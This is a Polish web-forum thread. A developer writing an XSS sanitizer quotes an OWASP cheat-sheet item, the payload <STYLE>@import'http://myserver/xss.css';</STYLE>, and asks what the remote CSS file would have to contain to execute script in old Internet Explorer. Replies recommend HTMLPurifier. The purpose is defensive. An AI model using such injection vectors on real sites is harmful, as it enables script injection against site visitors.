Cześć.
Próbuję napisać funkcję sanitize, jest prawie ukończona, ale nie rozumiem jednego z wektorów ataku, cytat z https://www.owasp.org/index.php/XSS_Filter_...le_sheet_part_2 :
Remote style sheet part 2
This works the same as above, but uses a STYLE tag instead of a LINK tag. A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end /STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: <STYLE>@import'http://myserver/xss.css';</STYLE>
Chodzi o to, co miałbym wstawić do pliku myserver/xss.css aby cokolwiek uzyskać?
Próbowałem alert('xss'), oraz <script>alert('xss')</script> żadne nic ciekawego nie robi. Próbuję w IE <=8 bo podobno tylko tam to działa.
Pełna wersja: [JavaScript][inne][PHP]Xss - Atak poprzez <STYLE>@import'http://myserver/xss.css';</STYLE>
A po co sam to piszesz skoro od dawna jest biblioteka http://htmlpurifier.org/ i na 100% będzie lepiej napisana?
He... identycznie jak u mnie na praktykach. Te same rzeczy probuja przepchac przez czat.
test
Cytat(viking @ 1.09.2014, 17:52:04 ) 
A po co sam to piszesz skoro od dawna jest biblioteka http://htmlpurifier.org/ i na 100% będzie lepiej napisana?
Kurde, naprawdę szukałem
wpisywałem min. php xss sanitize i nic mądrego nie wyskakiwało. Teraz jak się pobawiłem, to widzę, że jakbym po prostu wpisał php xss library to bym znalazł.Dzięki! Następnym razem dłużej się pobawię z googlem. Ale przynajmniej czegoś tam się ciekawego dowiedziałem (próbuję szukać jakiś pozytywów
)To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.